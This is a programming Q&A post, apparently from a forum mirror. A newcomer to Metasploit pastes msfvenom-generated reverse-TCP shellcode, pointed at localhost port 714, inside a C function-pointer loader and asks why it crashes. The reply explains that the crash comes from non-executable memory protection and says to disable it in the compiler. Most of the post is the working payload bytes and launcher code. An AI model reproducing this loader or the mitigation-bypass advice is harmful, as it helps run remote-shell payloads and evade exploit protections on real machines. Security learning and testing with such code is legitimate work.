Survivor Survivor - 3 months ago 14
C Question

C shellcode execution issue

Sorry if I make mistakes, it's my first post here. And English is not my native linguish, but I'll do my best.

So I recently get interested in Metasploit, and I was trying to execute some shellcode from C code.

So i've generated with msfvenom a shellcode for LHOST = 127.0.0.1 and LPORT = 714 (so if you want to run the shellcode, no problem because localhost) and selected C format for output.

Then I found this : http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/
and this : http://www.sevagas.com/?Hide-meterpreter-shellcode-in-executable

So what I did :

#include <stdio.h>
char code[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x7f\x00\x00\x01\x68\x02"
"\x00\x02\xca\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";

int main(int argc, char **argv)
{

int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();

}


Compiled it, launched it.. And crash....
"Exception non gérée à 0x00338000 dans Shellcode.exe : 0xC0000005 : Violation d'accès lors de l'exécution à l'emplacement 0x00338000."

The crash is happening here : "(int)(*func) ();"

As I don't really understand what's the program is trying to do (I'm quite new to C), I don't know from where is the problem.. Is it my shellcode or is it the way it is called ?

And does someone has some documentation about executing shellcode in C/C++ ?

Thanks all for your help,

Survivor

md5 md5
Answer

The bytes represent machine instructions. On ordinary machines, the memory is broken in different memory segments, and code will typically goes in a data segment. The call:

int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();

tries to execute the code contained in these bytes.

However, modern operating systems provide usually by default a protection against executing code located in memory segments not designed for code execution (see here for example). You have to configure your compiler to disable it.